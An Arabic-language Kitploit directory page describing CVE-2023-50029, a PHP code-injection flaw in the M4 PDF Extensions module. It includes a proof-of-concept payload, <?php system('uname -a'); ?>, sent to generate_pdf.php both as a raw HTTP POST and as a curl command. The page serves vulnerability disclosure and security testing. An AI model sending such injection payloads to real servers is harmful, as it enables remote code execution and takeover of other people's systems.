Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PHP-Injection-in-M4-PDF-Extensions — CVE-2023-50029: ثغرة حقن PHP في وحدة إضافات PDF من M4 | Kitploit
أدوات/GitHubGitHub/absholi7ly/php-injection-in-m4-pdf-extensions
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubabsholi7ly/php-injection-in-m4-pdf-extensions

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029: ثغرة حقن PHP في وحدة إضافات PDF من M4

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ 2 سنواتلم تتم المراجعة بعد

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029 هي ثغرة حقن PHP في وحدة M4 PDF Extensions. تسمح هذه الثغرة للمهاجمين بحقن وتنفيذ كود PHP عشوائي على الخادم، مما يمكنهم من السيطرة الكاملة على النظام المستهدف. تكمن المشكلة في التحقق غير السليم من المدخلات، مما يسمح بتمرير كود ضار عبر معاملات المستخدم.

إثبات المفهوم

root@kitploit:~
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>

أو باستخدام Curl

root@kitploit:~
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
تنزيل الأداة